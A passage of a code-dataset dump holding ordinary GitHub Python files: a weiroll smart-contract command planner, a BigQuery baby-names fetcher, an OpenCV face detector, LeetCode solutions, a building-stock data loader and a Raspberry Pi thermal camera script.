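        if is_subplan(arg):
            if has_subplan:
                raise ValueError("Subplans can only take one planner argument")
            has_subplan = True
        elif is_state(arg):
            if has_state:
                raise ValueError("Subplans can only take one state argument")
            has_state = True
    if not (has_subplan and has_state):
        raise ValueError("Subplans must take planner and state arguments")

check_subplan_args(["plan", "state"], lambda a: a == "plan", lambda a: a == "state")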
Note that the planner library is not aware of these changes -\n * so it may produce invalid plans if you don't know what you're doing.\n * @param call The [[FunctionCall]] to execute\n \"\"\"\n if (call.fragment.outputs and len(call.fragment.outputs) != 1) or call.fragment.outputs[0] != \"bytes[]\":\n raise ValueError(\"Function replacing state must return a bytes[]\")\n self.commands.append(Command(call, CommandType.RAWCALL))\n\n def _preplan(self, commandVisibility, literalVisibility, seen=None, planners=None):\n if seen is None:\n seen: set[Command] = set()\n if planners is None:\n planners: set[WeirollPlanner] = set()\n\n if self in planners:\n raise ValueError(\"A planner cannot contain itself\")\n planners.add(self)\n\n # Build visibility maps\n for command in self.commands:\n inargs = command.call.args\n if command.call.flags & CommandFlags.CALLTYPE_MASK == CommandFlags.CALL_WITH_VALUE:\n if not command.call.callvalue:\n raise ValueError(\"Call with value must have a value parameter\")\n inargs = [command.call.callvalue] + inargs\n\n for arg in inargs:\n if isinstance(arg, ReturnValue):\n if not arg.command in seen:\n raise ValueError(f\"Return value from '{arg.command.call.fragment.name}' is not visible here\")\n commandVisibility[arg.command] = command\n elif isinstance(arg, LiteralValue):\n literalVisibility[arg.value] = command\n elif isinstance(arg, SubplanValue):\n subplanSeen = seen # do not copy\n if not command.call.fragment.outputs:\n # Read-only subplan; return values aren't visible externally\n subplanSeen = set(seen)\n arg.planner._preplan(commandVisibility, literalVisibility, subplanSeen, planners)\n elif not isinstance(arg, StateValue):\n raise ValueError(f\"Unknown function argument type '{arg}'\")\n\n seen.add(command)\n\n return commandVisibility, literalVisibility\n\n def _buildCommandArgs(self, command: Command, returnSlotMap, literalSlotMap, state):\n # Build a list of argument value indexes\n inargs = command.call.args\n if command.call.flags & CommandFlags.CALLTYPE_MASK == CommandFlags.CALL_WITH_VALUE:\n if not command.call.callvalue:\n raise ValueError(\"Call with value must have a value parameter\")\n inargs = [command.call.callvalue] + inargs\n\n args: list[int] = []\n for arg in inargs:\n if isinstance(arg, ReturnValue):\n slot = returnSlotMap[arg.command]\n elif isinstance(arg, LiteralValue):\n slot = literalSlotMap[arg.value]\n elif isinstance(arg, StateValue):\n slot = 0xFE\n elif isinstance(arg, SubplanValue):\n # buildCommands has already built the subplan and put it in the last state slot\n slot = len(state) - 1\n else:\n raise ValueError(f\"Unknown function argument type {arg}\")\n if isDynamicType(arg.param):\n slot |= 0x80\n args.append(slot)\n\n return args\n\n def _buildCommands(self, ps: PlannerState) -> list[str]:\n encodedCommands = []\n for command in self.commands:\n if command.type == CommandType.SUBPLAN:\n # find the subplan\n subplanner = next(arg for arg in command.call.args if isinstance(arg, SubplanValue)).planner\n subcommands = subplanner._buildCommands(ps)\n ps.state.append(HexBytes(eth_abi.encode_single(\"bytes32[]\", subcommands))[32:])\n # The slot is no longer needed after this command\n ps.freeSlots.append(len(ps.state) - 1)\n\n flags = command.call.flags\n\n args = self._buildCommandArgs(command, ps.returnSlotMap, ps.literalSlotMap, ps.state)\n\n if len(args) > 6:\n flags |= CommandFlags.EXTENDED_COMMAND\n\n # Add any newly unused state slots to the list\n ps.freeSlots.extend(ps.stateExpirations[command])\n\n ret = 0xFF\n if 
command in ps.commandVisibility:\n if command.type in [CommandType.RAWCALL, CommandType.SUBPLAN]:\n raise ValueError(\n f\"Return value of {command.call.fragment.name} cannot be used to replace state and in another function\"\n )\n ret = len(ps.state)\n\n if len(ps.freeSlots) > 0:\n ret = ps.freeSlots.pop()\n\n # store the slot mapping\n ps.returnSlotMap[command] = ret\n\n # make the slot available when it's not needed\n expiryCommand = ps.commandVisibility[command]\n ps.stateExpirations[expiryCommand].append(ret)\n\n if ret == len(ps.state):\n ps.state.append(b\"\")\n\n if (\n command.call.fragment.outputs and isDynamicType(command.call.fragment.outputs[0])\n ) or command.call.flags & CommandFlags.TUPLE_RETURN != 0:\n ret |= 0x80\n elif command.type in [CommandType.RAWCALL, CommandType.SUBPLAN]:\n if command.call.fragment.outputs and len(command.call.fragment.outputs) == 1:\n ret = 0xFE\n\n if flags & CommandFlags.EXTENDED_COMMAND == CommandFlags.EXTENDED_COMMAND:\n # extended command\n encodedCommands.extend(\n [\n hexConcat(\n command.call.fragment.signature,\n flags,\n [0xFF] * 6,\n ret,\n command.call.contract.address,\n ),\n hexConcat(padArray(args, 32, 0xFF)),\n ]\n )\n else:\n # standard command\n encodedCommands.append(\n hexConcat(\n command.call.fragment.signature,\n flags,\n padArray(args, 6, 0xFF),\n ret,\n command.call.contract.address,\n )\n )\n return encodedCommands\n\n def plan(self) -> tuple[list[str], list[str]]:\n # Tracks the last time a literal is used in the program\n literalVisibility: dict[str, Command] = {}\n # Tracks the last time a command's output is used in the program\n commandVisibility: dict[Command, Command] = {}\n\n self._preplan(commandVisibility, literalVisibility)\n\n # Maps from commands to the slots that expire on execution (if any)\n stateExpirations: dict[Command, list[int]] = defaultdict(list)\n\n # Tracks the state slot each literal is stored in\n literalSlotMap: dict[str, int] = {}\n\n state: list[str] = []\n\n # Prepopulate the state and state expirations with literals\n for (literal, lastCommand) in literalVisibility.items():\n slot = len(state)\n state.append(literal)\n literalSlotMap[literal] = slot\n stateExpirations[lastCommand].append(slot)\n\n ps: PlannerState = PlannerState(\n returnSlotMap={},\n literalSlotMap=literalSlotMap,\n freeSlots=[],\n stateExpirations=stateExpirations,\n commandVisibility=commandVisibility,\n state=state,\n )\n\n encodedCommands = self._buildCommands(ps)\n\n return encodedCommands, state\n","repo_name":"fp-crypto/weiroll-py","sub_path":"weiroll.py","file_name":"weiroll.py","file_ext":"py","file_size_in_byte":29865,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"51"} +{"seq_id":"74694452638","text":"#-*- coding:utf-8 -*-\nfrom preprocess import Vector\nimport sys\n\n\ndef list2file(rs_list, fout):\n with open(fout, 'w') as f:\n for i, val in enumerate(rs_list):\n f.write(\"{}\\n\".format(val.encode(\"utf-8\")))\n\n\n\nif __name__ == \"__main__\":\n fin = sys.argv[1]\n fout = sys.argv[2]\n\n rs_list = []\n with open(fin, 'r') as f:\n for line in f:\n vec1 = Vector.str2vec(line.strip(\"\\r\\n\"))\n rs_list.append(vec1)\n list2file(rs_list, fout)\n\n","repo_name":"ddskyfuyu/robot","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73076486878","text":"from google.cloud import bigquery\nfrom google_auth_oauthlib import 
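Each standard command assembled above packs into a single 32-byte word: a 4-byte selector, one flag byte, six one-byte argument slots, one return-slot byte, and a 20-byte target address. A layout check with placeholder values (the selector and address below are stand-ins, not values from this code):

selector = bytes.fromhex("a9059cbb")          # placeholder 4-byte selector
flags = bytes([0x01])                         # CALL
arg_slots = bytes([0x00, 0x01] + [0xFF] * 4)  # two used args, rest unused
ret_slot = bytes([0xFF])                      # no return value
target = bytes(20)                            # placeholder address
command = selector + flags + arg_slots + ret_slot + target
assert len(command) == 32                     # 4 + 1 + 6 + 1 + 20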
flow\nimport argparse\nimport time\nimport uuid\n\n'''\nhttps://cloud.google.com/bigquery/public-data/usa-names\nhttps://cloud.google.com/bigquery/authentication\n'''\n\ndef get(filename):\n\tdef fetchData():\n\t\tdef wait_for_job(job):\n\t\t\twhile True:\n\t\t\t\tjob.reload() # Refreshes the state via a GET request.\n\t\t\t\tif job.state == 'DONE':\n\t\t\t\t\tif job.error_result:\n\t\t\t\t\t\traise RuntimeError(job.errors)\n\t\t\t\t\treturn\n\t\t\t\ttime.sleep(1)\n\n\t\tdef run_query(credentials, project, query):\n\t\t\tclient = bigquery.Client(project=project, credentials=credentials)\n\t\t\tquery_job = client.run_async_query(str(uuid.uuid4()), query)\n\t\t\tquery_job.use_legacy_sql = False\n\t\t\tquery_job.begin()\n\n\t\t\twait_for_job(query_job)\n\n\t\t\tquery_results = query_job.results()\n\t\t\trows = query_results.fetch_data()\n\n\t\t\treturn rows\n\n\n\t\tdef authenticate_and_query(project, query, launch_browser=True):\n\t\t\tappflow = flow.InstalledAppFlow.from_client_secrets_file(\n\t\t\t\t'client_secret.json',\n\t\t\t\tscopes=['https://www.googleapis.com/auth/bigquery'])\n\n\t\t\tif launch_browser:\n\t\t\t\tappflow.run_local_server()\n\t\t\telse:\n\t\t\t\tappflow.run_console()\n\n\t\t\treturn run_query(appflow.credentials, project, query)\n\n\t\tquery = \"\"\"\n\t\t#StandardSQL\n\t\tSelect state,gender,year,name,number\n\t\tFrom `bigquery-public-data.usa_names.usa_1910_current`\n\n\t\tOrder by name,year\n\t\t\"\"\"\n\t\treturn authenticate_and_query(\"names-project-175500\", query)\n\n\n\tout = fetchData()\n\twith open(filename, \"w+\") as f:\n\t\tf.write(\"state,gender,year,name,number\")\n\t\tfor row in out:\n\t\t\tf.write(\"{},{},{},{},{}\".format(str(row[0]), str(row[1]), str(row[2]), str(row[3]), str(row[4])) + \"\\n\")\n\n\treturn filename\n\nget(\"raw.csv\")","repo_name":"DellAgli/US-Census-Name-History-Visualizer","sub_path":"Fetch/Data/getdataraw.py","file_name":"getdataraw.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1246224467","text":"import cv2\n\n#Load some pre-trained data on face frontals from opencv (haar cascade algorithm)\npre_trained_face_data = cv2.CascadeClassifier('haarcascade_frontal_face.xml')\n\n#Choose an image to detect faces in and grayscale it\ndetectable_img = cv2.imread('34.webp')\ngrayscaled_img = cv2.cvtColor(detectable_img, cv2.COLOR_BGR2GRAY)\n\n#Detect faces\nface_coordinates = pre_trained_face_data.detectMultiScale(grayscaled_img)\n\n#Draw a rectangle to a face\nfor (x, y, w, z) in face_coordinates:\n cv2.rectangle(detectable_img, (x, y), (x + w, y + z), (0, 255, 0), 2)\n\nprint(face_coordinates)\n\n#Show the face\ncv2.imshow('Face detector', detectable_img)\ncv2.waitKey();\n\nprint(\"Code completed\")","repo_name":"pylnpt/face_recognition","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5745908559","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n res = []\n slength = len(s)\n \n def backtrack(partition, index):\n if index == slength:\n res.append(partition)\n return \n \n for i in range(index, slength+1):\n substring = s[index: i+1]\n if substring == substring[::-1]:\n backtrack(partition+[substring], i+1)\n \n backtrack([], 0)\n return 
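The run_async_query/fetch_data calls in the record above come from an early google-cloud-bigquery release; in current releases the equivalent flow is client.query(), roughly as below. This is a sketch under that assumption, not a drop-in replacement for the polling loop:

from google.cloud import bigquery

def run_query(credentials, project, sql):
    client = bigquery.Client(project=project, credentials=credentials)
    query_job = client.query(sql)    # standard SQL is the default in modern releases
    return list(query_job.result())  # .result() blocks until the job is DONE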
res\n","repo_name":"kapil87/LeetCode","sub_path":"palindromePartitionBacktracking.py","file_name":"palindromePartitionBacktracking.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43703699587","text":"class Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n starting_spot = 0\n current_gas = 0\n total_gas = 0\n for i in range(len(gas)):\n current_gas += gas[i] - cost[i]\n total_gas += gas[i] - cost[i]\n \n if current_gas < 0:\n current_gas = 0\n starting_spot = i+1\n \n if total_gas < 0:\n return -1\n else:\n return starting_spot\n\n\n\n# 시간 초과로 인해 실패하고 다음에 고쳐볼 코드\n\n# if len(gas) == 1 and gas[0] >= cost[0]:\n# return 0\n \n# able_starting_point = [i for i in range(len(gas)) if gas[i] - cost[i] >= 0] # 리스트 컴프리헨션으로 가능한 시작지점을 찾음\n# if not able_starting_point: # 가능한 시작 지점이 없는 경우\n# return -1\n \n \n# for starting_spot in able_starting_point:\n# current_gas = 0\n# current_spot = starting_spot\n# for n in range(len(gas)):\n# current_gas += gas[current_spot] # 현 시점에서 가스를 먼저 채우고\n# current_gas -= cost[current_spot] # 현 지점에서 다음 지점으로 이동하는데에 드는 코스트를 계산\n# if current_gas < 0:\n# break\n# current_spot = (current_spot+1) % len(gas)\n# if current_gas >= 0:\n# return starting_spot\n \n# return -1","repo_name":"jkhyjkhy/LeetCode","sub_path":"0134-gas-station/0134-gas-station.py","file_name":"0134-gas-station.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70922603998","text":"import numpy as np\nfrom pathlib import Path\nimport h5py\nimport pandas as pd\n\n\nBUILDING_CLASS_COLUMNS = {\n \"index\": int,\n \"name\": str,\n \"construction_period_start\": int,\n \"construction_period_end\": int,\n \"building_categories_index\": int,\n \"number_of_dwellings_per_building\": \"float32\",\n \"number_of_persons_per_dwelling\": \"float32\",\n \"length_of_building\": \"float32\",\n \"width_of_building\": \"float32\",\n \"number_of_floors\": \"float32\",\n \"room_height\": \"float32\",\n \"percentage_of_building_surface_attached_length\": \"float32\",\n \"percentage_of_building_surface_attached_width\": \"float32\",\n \"share_of_window_area_on_gross_surface_area\": \"float32\",\n \"share_of_windows_oriented_to_south\": \"float32\",\n \"share_of_windows_oriented_to_north\": \"float32\",\n \"grossfloor_area\": \"float32\",\n \"heated_area\": \"float32\",\n \"areafloor\": \"float32\",\n \"areawindows\": \"float32\",\n \"area_suitable_solar\": \"float32\",\n \"grossvolume\": \"float32\",\n \"heatedvolume\": \"float32\",\n \"heated_norm_volume\": \"float32\",\n \"hwb\": \"float32\",\n \"hwb_norm\": \"float32\",\n \"u_value_ceiling\": \"float32\",\n \"u_value_exterior_walls\": \"float32\",\n \"u_value_windows1\": \"float32\",\n \"u_value_windows2\": \"float32\",\n \"u_value_roof\": \"float32\",\n \"u_value_floor\": \"float32\",\n \"seam_loss_windows\": \"float32\",\n \"trans_loss_walls\": \"float32\",\n \"trans_loss_ceil\": \"float32\",\n \"trans_loss_wind\": \"float32\",\n \"trans_loss_floor\": \"float32\",\n \"trans_loss_therm_bridge\": \"float32\",\n \"trans_loss_ventilation\": \"float32\",\n \"total_heat_losses\": \"float32\",\n \"average_effective_area_wind_west_east_red_cool\": \"float32\",\n \"average_effective_area_wind_south_red_cool\": \"float32\",\n \"average_effective_area_wind_north_red_cool\": \"float32\",\n \"spec_int_gains_cool_watt\": \"float32\",\n 
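The greedy gas-station solution above rests on the invariant that if the running tank goes negative at station i, no start point at or before i can work, so the search resumes at i+1. A small brute-force cross-check of the greedy answer on the classic example:

def greedy(gas, cost):
    start = cur = total = 0
    for i in range(len(gas)):
        cur += gas[i] - cost[i]
        total += gas[i] - cost[i]
        if cur < 0:           # stations <= i are ruled out in one step
            cur, start = 0, i + 1
    return start if total >= 0 else -1

def brute(gas, cost):
    n = len(gas)
    for s in range(n):
        tank = 0
        for k in range(n):
            tank += gas[(s + k) % n] - cost[(s + k) % n]
            if tank < 0:
                break
        else:
            return s
    return -1

assert greedy([1, 2, 3, 4, 5], [3, 4, 5, 1, 2]) == brute([1, 2, 3, 4, 5], [3, 4, 5, 1, 2]) == 3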
\"attached_surface_area\": \"float32\",\n \"n_50\": \"float32\",\n}\n\nBUILDING_SEGMENT_COLUMNS = {\n \"index\": int,\n \"name\": str,\n \"building_classes_index\": int,\n \"number_of_buildings\": \"float32\",\n \"heat_supply_system_index\": int,\n \"installation_year_system_start\": \"float32\",\n \"installation_year_system_end\": \"float32\",\n \"distribution_sh_index\": int,\n \"distribution_dhw_index\": int,\n \"pv_system_index\": int,\n \"energy_carrier\": int,\n \"annual_energy_costs_hs\": \"float32\",\n \"total_annual_cost_hs\": \"float32\",\n \"annual_energy_costs_dhw\": \"float32\",\n \"total_annual_cost_dhw\": \"float32\",\n \"hs_efficiency\": \"float32\",\n \"dhw_efficiency\": \"float32\",\n \"size_pv_system\": \"float32\",\n \"fed_ambient_sh_per_bssh\": \"float32\",\n \"fed_ambient_dhw_per_bssh\": \"float32\",\n}\n\nHEATING_SYSTEM_INDEX = {\n 1: \"no heating\",\n 2: \"no heating\",\n 3: \"district heating\",\n 4: \"district heating\",\n 5: \"district heating\",\n 6: \"district heating\",\n 7: \"district heating\",\n 8: \"district heating\",\n 9: \"oil\",\n 10: \"oil\",\n 11: \"oil\",\n 12: \"oil\",\n 13: \"oil\",\n 14: \"oil\",\n 15: \"oil\",\n 16: \"oil\",\n 17: \"oil\",\n 18: \"coal\",\n 19: \"coal\",\n 20: \"coal\",\n 21: \"gas\",\n 22: \"gas\",\n 23: \"gas\",\n 24: \"gas\",\n 25: \"gas\",\n 26: \"gas\",\n 27: \"gas\",\n 28: \"gas\",\n 29: \"wood\",\n 30: \"wood\",\n 31: \"wood\",\n 32: \"wood\",\n 33: \"wood\",\n 34: \"wood\",\n 35: \"wood\",\n 36: \"wood\",\n 37: \"electricity\", # TODO rein nehmen\n 38: \"electricity\", # TODO rein nehmen\n 39: \"electricity\", # TODO rein nehmen\n 40: \"split system\", # TODO rein nehmen!\n 41: \"split system\", # TODO rein nehmen!\n 42: \"heat pump air\",\n 43: \"heat pump ground\",\n 44: \"electricity\" # TODO rein nehmen\n}\n\ndef select_invert_building(gdf_row, invert_selection: pd.DataFrame):\n # check if the construction year from urban3r is available in invert:\n\n if gdf_row['invert_construction_period'] in invert_selection[\"construction_period\"]:\n invert_selection.query(f\"construction_period == {gdf_row['invert_construction_period']}\")\n\n # if it is not available take the closest\n else:\n pass\n\n\ndef hdf5_to_pandas(hdf5_file: Path, group_name, columns) -> pd.DataFrame:\n with h5py.File(hdf5_file, 'r') as file:\n # Get the table from the group\n dataset = file[group_name]\n df = pd.DataFrame(index=range(len(dataset)), columns=[list(columns.keys())])\n for name in columns.keys():\n df[name] = dataset[name]\n\n return df\n\n\ndef get_number_energy_carriers_from_invert(group: pd.DataFrame) -> dict:\n numbers = group.groupby(\"energy_carrier_name\")[\"number_of_buildings\"].sum()\n return numbers.to_dict()\n\n\ndef to_series(col):\n if isinstance(col, (pd.DataFrame, pd.Series)):\n return col.squeeze()\n elif isinstance(col, (list, np.ndarray)):\n return pd.Series(col)\n else:\n return col\n\n\ndef calc_mean(data: dict) -> float:\n # Multiply each key with its corresponding value and add them\n sum_products = sum(key * value for key, value in data.items())\n # Calculate the sum of the values\n sum_values = sum(value for value in data.values())\n # Return the mean value\n if sum_values == 0:\n return np.nan\n return sum_products / sum_values\n\n\ndef calculate_mean_supply_temperature(grouped_df: pd.DataFrame,\n heating_system_name: str = None,\n helper_name: str = None) -> float:\n # add supply temperature to bc df:\n # check if there are multiple supply temperatures:\n supply_temperatures = list(grouped_df.loc[:, 
\"supply_temperature\"].unique())\n if len(supply_temperatures) > 1:\n # group by supply temperature\n supply_temperature_group = grouped_df.groupby(\"supply_temperature\")\n nums = {}\n for temp in supply_temperatures:\n if helper_name == \"get_number_of_buildings\":\n number_buildings_sup_temp = supply_temperature_group.get_group(temp)[\"number_of_buildings\"].sum()\n else:\n number_buildings_sup_temp = supply_temperature_group.get_group(temp)[heating_system_name].sum()\n\n nums[temp] = number_buildings_sup_temp\n # calculate the mean:\n # sometimes the supply temperature is 1000 °C because\n mean_sup_temp = calc_mean(nums)\n else:\n mean_sup_temp = supply_temperatures[0]\n\n return mean_sup_temp\n\n\ndef calculate_mean(grouped: pd.DataFrame, names: list, number_of_buildings: str):\n if grouped[number_of_buildings].sum() == 0: # create nan row so it can be easily dropped later\n new_row = pd.Series(data=[np.nan] * len(grouped[names].columns), index=grouped[names].columns)\n else:\n weights = grouped[number_of_buildings] / grouped[number_of_buildings].sum()\n new_row = (grouped[names].T * weights).T.sum()\n return new_row\n\n\ndef create_representative_building(group: pd.DataFrame,\n column_name_with_numbers: str,\n merging_names: list,\n adding_names: list) -> pd.DataFrame:\n new_row = pd.DataFrame(columns=group.columns, index=[0])\n # representative air source HP building\n new_row.loc[0, merging_names] = calculate_mean(group,\n names=merging_names,\n number_of_buildings=column_name_with_numbers)\n new_row.loc[0, adding_names] = group.loc[:, adding_names].sum()\n\n # new name is first 5 letters of first name + heating system\n new_row.loc[0, \"heating_medium\"] = group.loc[:, \"heating_medium\"].values[-1]\n new_row[\"construction_period_start\"] = group[\"construction_period_start\"].values[-1]\n new_row[\"construction_period_end\"] = group[\"construction_period_end\"].values[-1]\n new_row.loc[0, \"name\"] = f\"{str(group.loc[:, 'name'].iloc[0])}\"\n new_row.loc[0, \"index\"] = group.loc[:, \"index\"].iloc[0] # new index is the first index of merged rows\n return new_row\n\n\ndef filter_only_sevilla_buildings(df: pd.DataFrame):\n mask = df[\"name\"].astype(str).isin([name for name in df[\"name\"].astype(str) if \"Sevilla\" in name])\n return df.loc[mask, :]\n\n\ndef get_number_of_buildings_from_invert_spain() -> pd.DataFrame:\n hdf5_f = Path(r\"C:\\Users\\mascherbauer\\PycharmProjects\\OSM\\001_buildings_spain.hdf5\")\n bc_df = hdf5_to_pandas(hdf5_f, f\"BC_{2020}\", BUILDING_CLASS_COLUMNS)\n bssh_df = hdf5_to_pandas(hdf5_f, f\"BSSH_{2020}\", BUILDING_SEGMENT_COLUMNS)\n # reomve multiindex\n bssh_df.columns = bssh_df.columns.map(''.join)\n bc_df.columns = bc_df.columns.map(''.join)\n # change columns to series:\n bssh = bssh_df.apply(to_series)\n bc = bc_df.apply(to_series)\n bc[\"building_categories_index\"] = bc[\"building_categories_index\"].astype(int)\n # use only Sevilla buildings!\n bc = filter_only_sevilla_buildings(bc)\n bssh = filter_only_sevilla_buildings(bssh)\n\n # columns where numbers are summed up (PV and number of buildings)\n adding_names = [name for name in bc.columns if \"number\" in name] + [\"number_of_buildings\"]\n # columns to merge: [2:] so index and name are left out\n merging_names = [\n name for name in bc.columns if \"PV\" and \"number\" not in name and \"construction\" not in name\n ][2:] + adding_names[:3]\n # except number of persons and number of dwellings ([3:]) left out\n adding_names = adding_names[3:]\n\n # Group the rows of bssh_df by 
building_classes_index\n bssh_grouped = bssh.groupby([\"building_classes_index\", \"heat_supply_system_index\"])\n new_bc = pd.DataFrame()\n for (index, heat_system), group in bssh_grouped:\n # reset the index to the invert index:\n group = group.set_index(\"index\")\n bc_group = bc.loc[bc.loc[:, \"index\"].isin(list(group.index)), :]\n # check if bc_group is an empty frame and continue if so\n if bc_group.shape[0] == 0:\n continue\n bc_group.loc[:, \"number_of_buildings\"] = bc_group.loc[:, \"index\"].map(group.loc[:, \"number_of_buildings\"])\n bc_group.loc[:, \"heating_medium\"] = HEATING_SYSTEM_INDEX[heat_system]\n # create representative building out of the same invert buildings with different heating systems\n new_building = create_representative_building(group=bc_group,\n column_name_with_numbers=\"number_of_buildings\",\n merging_names=merging_names,\n adding_names=adding_names)\n\n new_bc = pd.concat([new_bc, new_building], axis=0)\n\n # drop nan rows because the number of buildings is 0\n final_df = new_bc.dropna(axis=0).reset_index(drop=True)\n return final_df\n\n\n\nif __name__ == \"__main__\":\n get_number_of_buildings_from_invert_spain()\n\n","repo_name":"PhilippMaschi/OSM","sub_path":"load_invert_data.py","file_name":"load_invert_data.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10354935736","text":"from collections import deque\nimport os\nimport shutil\nimport time\nimport cv2\nimport numpy as np\nimport datetime\nfrom picamera2 import Picamera2\nfrom picamera2.encoders import H264Encoder, Quality\nfrom picamera2.outputs import CircularOutput\n\nos.chdir('/home/matejnevlud/')\n\n# Configure camera for 2304, 1296 mode\npicam2 = Picamera2()\nvideo_config = picam2.create_video_configuration({'size': (256, 192), 'format': 'XBGR8888'},\n raw={'size': (2304, 1296)},\n controls={'NoiseReductionMode': 0, 'FrameRate': 50})\npicam2.configure(video_config)\npicam2.start_preview()\nencoder = H264Encoder()\nencoder.output = CircularOutput()\npicam2.encoder = encoder\npicam2.start()\npicam2.start_encoder(encoder=encoder, quality=Quality.LOW)\n\nthermalcamera = Picamera2(1)\nthermalcamera.configure(thermalcamera.create_video_configuration(raw=True))\nthermalcamera.start()\n\ntime.sleep(2)\n\nbgsub = cv2.bgsegm.createBackgroundSubtractorCNT(minPixelStability=1, useHistory=False, maxPixelStability=2, isParallel=True)\n\n# named fullscreen window on ubutn\n# cv2.namedWindow('frame', cv2.WND_PROP_FULLSCREEN)\n# cv2.setWindowProperty('frame', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\nDIR_NAME = '/home/matejnevlud/thermal_images_' + timestamp\n# os.makedirs(DIR_NAME, exist_ok=True)\nos.makedirs('XXX', exist_ok=True)\n\n# Capture 100 frames and calculate FPS\nlast_time = time.time()\nframe_count = 0\ncolor_frame = np.zeros((192, 256, 3), dtype=np.uint8)\nthermal_frame = np.zeros((192, 256), dtype=np.float32)\n\n# create deques for storing max value\n# and min value for the last 100 frames\nmax_t_deque = deque(maxlen=100)\nmin_t_deque = deque(maxlen=100)\nmean_t_deque = deque(maxlen=100)\n\nDEQUE_LEN = 200\nsoup_area_deque = deque(maxlen=200)\nsoup_t_deque = deque(maxlen=200)\nsoup_min_t_deque = deque(maxlen=200)\nsoup_avg_t_deque = deque(maxlen=200)\nsoup_delta_t_deque = deque(maxlen=200)\nlast_soup_timestamp = datetime.datetime.now()\n\nlast_soup_min_t_z_score = 0\n\n\ndef preprocess_pi_frame(pi_frame):\n 
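The merge driving the loop above is a per-column weighted average: each building class contributes to the representative building in proportion to its number_of_buildings. The `(grouped[names].T * weights).T.sum()` pattern in isolation, with made-up numbers:

import pandas as pd

group = pd.DataFrame({
    "hwb": [100.0, 50.0],               # heating demand per class
    "number_of_buildings": [1.0, 3.0],  # weights
})
weights = group["number_of_buildings"] / group["number_of_buildings"].sum()
weighted_mean = (group[["hwb"]].T * weights).T.sum()
# (100 * 0.25) + (50 * 0.75) = 62.5
assert weighted_mean["hwb"] == 62.5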
pi_frame = cv2.cvtColor(pi_frame, cv2.COLOR_BGR2RGB)\n pi_frame = cv2.rotate(pi_frame, cv2.ROTATE_90_COUNTERCLOCKWISE)\n # cv2.imshow('pi_frame0', pi_frame)\n\n # pts1 = np.float32([[75, 0], [160, 0], [67, 207], [180, 220]])\n # pts2 = np.float32([[0, 0], [192, 0], [0, 340], [192, 340]])\n pts1 = np.float32([[60, 58], [172, 55], [55, 215], [190, 225]])\n pts2 = np.float32([[0, 0], [192, 0], [0, 256], [192, 256]])\n M = cv2.getPerspectiveTransform(pts1, pts2)\n pi_frame = cv2.warpPerspective(pi_frame, M, (192, 256), flags=cv2.INTER_NEAREST)\n\n # pyramid mean shift filtering\n # pi_frame = cv2.pyrMeanShiftFiltering(pi_frame, 3, 3)\n # pi_frame = cv2.bilateralFilter(pi_frame, 15, 30, 90)\n cv2.imshow('pi_frame2', pi_frame)\n\n pi_frame = cv2.GaussianBlur(pi_frame, (5, 5), 0)\n\n return pi_frame\n\n\ndef detect_soups(pi_frame_foreground):\n contours, hierarchy = cv2.findContours(pi_frame_foreground.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n pi_frame_foreground = np.zeros((256, 192), dtype=np.uint8)\n soups_rects = []\n for cnt in contours:\n hull = cv2.convexHull(cnt)\n area = cv2.contourArea(cnt)\n x, y, w, h = cv2.boundingRect(cnt)\n\n cv2.drawContours(pi_frame_foreground, [cnt], 0, (64, 64, 64), -1)\n\n if area > 3000 and w > 80 and h > w and y > 0 and y + h < 256:\n soup_area_deque.append(area)\n cv2.drawContours(pi_frame_foreground, [hull], 0, (255, 255, 255), -1)\n cv2.rectangle(pi_frame_foreground, (x, y), (x + w, y + h), (255, 255, 255), 2)\n soups_rects.append((x, y, w, h))\n\n return pi_frame_foreground, soups_rects\n\n\ndef preprocess_thermal_frame(frame_usb):\n frame_mid_pos = int(len(frame_usb) / 2)\n\n thermal_buffer = frame_usb[frame_mid_pos:]\n thermal_picture_u16 = np.frombuffer(thermal_buffer, dtype=np.uint16).reshape((192, 256))\n thermal_picture_u16 = cv2.rotate(thermal_picture_u16, cv2.ROTATE_90_COUNTERCLOCKWISE)\n thermal_picture_u16 >>= 2\n thermal_picture_f32 = thermal_picture_u16.astype(np.float32)\n thermal_picture_f32 /= 16\n thermal_picture_f32 -= 273.15\n\n thermal_picture_f32 = np.clip(thermal_picture_f32, 0, 50)\n\n return thermal_picture_f32\n\n\npi_frames_deque = deque(maxlen=10 * 25)\nusb_frames_deque = deque(maxlen=10 * 25)\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\nDIR_NAME = 'thermal_images_' + timestamp\n\n\ndef add_frames_to_buffer(pi_frame, usb_frame):\n pi_frames_deque.append(pi_frame)\n usb_frames_deque.append(usb_frame)\n\n\ndef save_frame_buffers_to_disk():\n print('saving frames to disk')\n os.makedirs(DIR_NAME, exist_ok=True)\n for i, (pi_frame, usb_frame) in enumerate(zip(pi_frames_deque, usb_frames_deque)):\n cv2.imwrite(f'{DIR_NAME}/frame_{i:04d}.png', pi_frame)\n with open(f'{DIR_NAME}/frame_{i:04d}.raw', 'wb') as f:\n f.write(usb_frame)\n # archive the folder\n shutil.make_archive(DIR_NAME, 'zip', DIR_NAME)\n # delete the folder\n 